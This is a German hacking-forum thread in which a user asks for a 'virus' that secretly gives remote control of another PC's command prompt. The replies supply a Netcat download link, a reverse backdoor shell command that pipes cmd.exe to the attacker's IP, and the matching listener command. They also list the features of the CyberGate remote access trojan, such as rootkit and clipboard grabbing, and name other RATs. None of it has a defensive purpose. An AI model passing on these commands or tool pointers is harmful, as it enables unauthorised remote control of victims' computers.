CMD Fernsteuern (mit Virus)

Guten Tag, ich beschäftige mich nun schon seit sehr langer Zeit mit dem Thema "Hacking", aber ich finde einfach keinen Virus, womit ich NUR die Eingabeaufforderung des Oper-PCs fernsteuern kann. Gibt es so etwas? Falls ja, wie heißen diese Arten von Virus? Vielleicht kann mir jemand einen (sicheren (nicht infizierten)) Link als Antwort posten.

Danke im Voraus,
italyboy4 :)
 
*SCNR*
Netcat - Wikipedia, the free encyclopedia
Windowsversion: http://joncraton.org/files/nc111nt.zip
Ist laut virustotal.com gaanz böse:
https://www.virustotal.com/en/file/...4566cad8363cb016acc8145e/analysis/1407694856/ (Detection ratio: 31 / 53)
How-To:
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
Code:
Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [port] –e cmd.exe
auf dem "MasterPC":
nc -L ip port

----------------

Cybergate sollte das auch haben:
Features and specs:

- server around 280 kb, depending on if icon is selected, rootkit, upx compressed, etc etc etc
- windows xp, vista and 7 compatible;
...
- Remote Chat Client;
- DOS Prompt;
- Run cmd;
- Clipboard Grabber;,
---------------
AcidShiver-CMD-Line-Rat, Schwarze Sonne und noch 1000 weitere.
Vielleicht kann mir jemand einen (sicheren (nicht infizierten)) Link als Antwort posten.

WinAPI + Pipes + etwas Netzwerkcode?
Be careful when redirecting both a process's stdin and stdout to pipes, for you can easily deadlock - The Old New Thing - Site Home - MSDN Blogs
Beej's Guide to Network Programming
http://joncraton.org/files/nc111nt.zip (Quellcode ist beigelegt)
 
Zurück
Oben